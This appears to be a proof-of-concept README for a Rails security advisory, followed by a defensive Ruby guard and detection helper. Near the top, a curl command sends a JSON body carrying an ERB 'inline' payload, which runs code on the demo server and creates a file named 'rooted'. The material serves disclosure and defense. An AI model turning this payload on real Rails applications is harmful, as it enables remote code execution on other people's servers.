Proof of concept for groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q
- Only run the Rails server in a way that you are certain will not open you up to being exploited.
- Run `rails s`
- Execute the following command:
  `curl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch \"rooted\"%>"}}' localhost:3000/exploits`
- Verify that the file "rooted" now exists in the project directory.
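
The request above works because a JSON body lets `id` arrive as a Hash instead of a String. The following is an added example, not code from this repository: a guard and a detection helper, assuming the `exploits` controller hands `params[:id]` to `render` (the controller is not shown on this page). `ALLOWED_TEMPLATES`, `safe_template` and `render_options_in_params?` are hypothetical names, and the sample bodies are constructed.

```ruby
require "json"

# Hypothetical allowlist of template names this controller may render.
ALLOWED_TEMPLATES = %w[show summary].freeze

# Render option keys that must never arrive from a client (non-exhaustive).
RENDER_OPTION_KEYS = %w[inline file template text plain partial].freeze

# Returns an allowlisted template name, or nil if the value is not a plain
# String naming a known template. A Hash (what a JSON object body produces)
# is rejected outright, so it can never be interpreted as render options.
def safe_template(value)
  return nil unless value.is_a?(String)
  ALLOWED_TEMPLATES.include?(value) ? value : nil
end

# Detection helper: true when any parameter value, at any depth, is a Hash
# carrying a render option key. Suitable for logging or rejecting a request.
def render_options_in_params?(params)
  case params
  when Hash
    params.any? do |_key, v|
      (v.is_a?(Hash) && (v.keys.map(&:to_s) & RENDER_OPTION_KEYS).any?) ||
        render_options_in_params?(v)
    end
  when Array
    params.any? { |v| render_options_in_params?(v) }
  else
    false
  end
end

# Constructed sample bodies: one benign, one with the shape of the request
# above (the ERB payload is replaced by a placeholder string).
BENIGN_BODY = '{"id": "show"}'
NESTED_BODY = '{"id": {"inline": "PLACEHOLDER"}}'

if __FILE__ == $PROGRAM_NAME
  [BENIGN_BODY, NESTED_BODY].each do |body|
    params = JSON.parse(body)
    puts "#{body} -> template=#{safe_template(params['id']).inspect} " \
         "flagged=#{render_options_in_params?(params)}"
  end
end
```

In a controller, the guard's return value is what would be passed to `render`, with a `nil` result answered by a 400 or 404 response.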